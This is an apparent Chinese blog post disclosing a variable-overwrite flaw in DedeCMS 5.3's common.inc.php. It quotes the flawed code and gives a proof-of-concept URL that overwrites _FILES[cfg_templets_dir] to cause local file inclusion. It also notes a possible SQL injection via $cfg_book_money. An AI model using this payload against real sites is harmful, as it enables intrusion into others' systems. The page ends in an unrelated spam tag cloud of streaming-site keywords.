dedecms 5.3的不足之处,加一鸡肋小漏!

Home » 技术教程 » dedecms 5.3的不足之处,加一鸡肋小漏!

by:xhming

common.inc.php

foreach($_REQUEST as $_k=>$_v){if( strlen($_k)>0 && eregi(^(cfg_|GLOBALS),$_k) && !isset($_COOKIE[$_k]) ) //可绕过cfg_|GLOBALS限制{ exit(Request var not allow!);}}

foreach(Array(_GET,_POST,_COOKIE) as $_request){foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); //可任意覆盖变量关键是_打头的变量}

覆盖_FILES[]可导置本地包含漏洞(gpc/off);

例:

h tt p://127.0.0.1/dedecms/plus/vote.php?aid=1&_FILES=1&_FILES[cfg_templets_dir][name]=&_FILES[cfg_templets_dir][type]=1&_FILES[cfg_templets_dir][size]=200&&_FILES[cfg_templets_dir][tmp_name]=/dedecms/

另一处可能注入:

if($rs) { $bv->dsql->ExecuteNoneQuery(“Update dede_member Set money=money-{$cfg_book_money} where id={$ml->M_ID} “);

也是利用_FILE覆盖$cfg_book_money.

顺境的美德是节制,逆境的美德是坚韧,这后一种是较为伟大的德性。

dedecms 5.3的不足之处,加一鸡肋小漏!

相关文章:

你感兴趣的文章:

标签云:

亚洲高清电影在线, 免费高清电影, 八戒影院夜间, 八戒电影最新大片, 出轨在线电影, 午夜电影院, 在线影院a1166, 在线电影院, 在线观看美剧下载, 日本爱情电影, 日韩高清电影在线, 电影天堂网, 直播盒子app, 聚合直播, 高清美剧, 高清美剧在线观看 EhViewer-E站, E站, E站绿色版, qqmulu.com, qq目录网, qq网站目录,